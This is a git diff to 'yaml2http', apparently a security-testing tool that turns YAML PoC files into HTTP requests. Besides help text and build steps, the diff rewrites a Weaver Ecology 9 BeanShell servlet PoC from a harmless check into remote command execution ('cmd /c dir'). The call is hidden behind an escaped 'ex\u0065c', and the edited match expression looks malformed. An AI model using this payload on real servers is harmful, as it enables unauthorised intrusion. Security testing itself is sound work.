diff --git a/README.md b/README.md index 6a3b64b..8bbcbd2 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,17 @@ Content-Length: 87 bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw ``` +帮助信息 + +```bash +java -jar yaml2http-1.0.jar -h +usage: yaml2http + -b,--bytes Path to file need to be convert, convert the file + content as bytes value with b"" format. + -h,--help Help info. + -p,--path Path to poc file. +``` + ### Burp Suite Extension 支持在`Burp Suite`中以插件形式进行使用,这种方式可以避免不可打印字符的问题。 @@ -44,6 +55,23 @@ bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.out ![](images/20220823113627.png) +## Build + +克隆源码到本地 + +```bash +git clone https://github.com/trganda/yaml2http +``` + +并执行 + +```bash +cd yaml2http +mvn clean compile assembly:single +``` + +之后可在`target`目录下查看编译后的`jar`包文件 + ## Todo * [X] 完成`yaml`解析,读取已支持字段值 diff --git a/src/main/java/com/github/trganda/App.java b/src/main/java/com/github/trganda/App.java index b46013f..c9950a8 100644 --- a/src/main/java/com/github/trganda/App.java +++ b/src/main/java/com/github/trganda/App.java @@ -16,8 +16,9 @@ public class App { public static void main(String[] args) throws IOException, ParseException { Options options = new Options(); + options.addOption("h", "help", false, "Help info."); options.addOption("p", "path", true, "Path to poc file."); - options.addOption("b", "bytes", true, "Path ot file need convert."); + options.addOption("b", "bytes", true, "Path to file need to be convert, convert the file content as bytes value with b\"\" format."); CommandLineParser parser = new DefaultParser(); CommandLine cmd = parser.parse(options, args); @@ -40,6 +41,9 @@ public static void main(String[] args) throws IOException, ParseException { is.read(buf); System.out.println(Util.toBytesValue(buf)); + } else { + HelpFormatter formatter = new HelpFormatter(); + formatter.printHelp("yaml2http", options); } } diff --git a/src/main/java/com/github/trganda/parser/PocsParser.java b/src/main/java/com/github/trganda/parser/PocsParser.java index 928b057..ed40ce2 100644 --- a/src/main/java/com/github/trganda/parser/PocsParser.java +++ b/src/main/java/com/github/trganda/parser/PocsParser.java @@ -1,5 +1,6 @@ package com.github.trganda.parser; +import com.fasterxml.jackson.databind.DeserializationFeature; import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.module.SimpleModule; import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; @@ -35,6 +36,8 @@ private void init() { mapper.registerModule(simpleModule); mapper.findAndRegisterModules(); + // skip unknown field + mapper.disable(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES); } public Pocs readPocs() throws IOException { diff --git a/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml b/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml index 2b86231..fa8b628 100644 --- a/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml +++ b/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml @@ -1,17 +1,16 @@ name: ecology9-beanshell-rce transport: http set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) + r1: b"\x22cmd /c dir\x22" rules: r0: request: method: POST path: /weaver/bsh.servlet.BshServlet - body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw + body: bsh.script=ex\u0065c({{r1}});&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw headers: Content-Type: application/x-www-form-urlencoded - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) + expression: response.status == 200 && response.body.bcontains("")) expression: r0() detail: author: trganda